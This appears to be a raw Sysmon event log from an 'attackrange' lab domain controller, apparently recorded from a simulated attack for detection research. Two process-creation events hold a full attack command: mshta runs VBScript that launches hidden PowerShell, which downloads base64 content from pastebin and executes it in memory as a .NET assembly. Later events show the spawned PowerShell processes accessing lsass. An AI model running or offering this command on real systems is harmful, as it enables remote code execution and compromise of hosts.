10341000x8000000000000000108075Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.878{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108074Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.878{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108073Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.878{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108072Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.878{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108071Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.878{58E9C193-B538-615A-6F02-00000000FC01}30568092C:\Windows\System32\cmd.exe{58E9C193-B541-615A-8002-00000000FC01}8588C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+f1e1|C:\Windows\System32\cmd.exe+11a37|C:\Windows\System32\cmd.exe+cb0d|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+c347|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108070Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.878{58E9C193-B541-615A-8002-00000000FC01}8588C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXEmshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/H2JdYYVV').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{58E9C193-B538-615A-6F02-00000000FC01}3056C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/H2JdYYVV').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 10341000x8000000000000000108069Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.867{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B541-615A-7F02-00000000FC01}8568C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108068Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.867{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B541-615A-7F02-00000000FC01}8568C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108067Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.846{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108066Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.846{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108065Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.846{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108064Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.846{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108063Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.846{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B541-615A-7F02-00000000FC01}8568C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108062Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.845{58E9C193-B538-615A-6902-00000000FC01}42005300C:\Windows\System32\cmd.exe{58E9C193-B541-615A-7F02-00000000FC01}8568C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+f1e1|C:\Windows\System32\cmd.exe+11a37|C:\Windows\System32\cmd.exe+cb0d|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+c347|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108061Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.845{58E9C193-B541-615A-7F02-00000000FC01}8568C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXEmshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/rQL02r6C').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{58E9C193-B538-615A-6902-00000000FC01}4200C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/rQL02r6C').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 23542300x8000000000000000108060Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.178{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A4A969CE0FA020169740CE3C01EEA53,SHA256=0DA72364373C5F6303BBF3436C56B64237C965CBBE865A33A02D12E67A1A68F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083673Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:14.513{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D65C68328EF3AF2C02F7605B5CC8D22,SHA256=BC4CEBBF9AF14AAF719D90DDA8A4B231E12565DA21F9569B9183AD10DABBA0AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108167Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.863{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2B6B6B0E27523B2502E1C386B7FAE5C8,SHA256=E92D45A3155032B7B953B81F6997C41F235E14978101A32349D8DE57D8154F51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108166Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.861{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B182368E7AF111FB2332DBFF13342E2C,SHA256=3B8C673B23A47E36E9EDE5BE157F31986B58FCF49B46285D35BD906F9B09950D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108165Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.639{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B542-615A-8402-00000000FC01}8764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108164Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.639{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B542-615A-8402-00000000FC01}8764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108163Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.626{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B542-615A-8602-00000000FC01}8800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108162Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.626{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B542-615A-8602-00000000FC01}8800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108161Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.609{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B542-615A-8402-00000000FC01}8764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108160Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.609{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B542-615A-8402-00000000FC01}8764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108159Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.596{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B542-615A-8602-00000000FC01}8800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108158Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.595{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B542-615A-8602-00000000FC01}8800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x8000000000000000108157Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 08:03:14.576{58E9C193-B542-615A-8402-00000000FC01}8764\PSHost.132778081940829670.8764.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 17141700x8000000000000000108156Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 08:03:14.568{58E9C193-B542-615A-8602-00000000FC01}8800\PSHost.132778081941051263.8800.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000108155Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.529{58E9C193-B542-615A-8402-00000000FC01}8764ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_4ht0zrvw.whq.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108154Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.528{58E9C193-B542-615A-8602-00000000FC01}8800ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_nk2ipmrj.q0f.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108153Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.525{58E9C193-B542-615A-8602-00000000FC01}8800ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_z0kye3ms.jyh.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108152Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.522{58E9C193-B542-615A-8402-00000000FC01}8764ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ajjdulhb.cfv.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000108151Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.492{58E9C193-B542-615A-8602-00000000FC01}8800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_z0kye3ms.jyh.ps12021-10-04 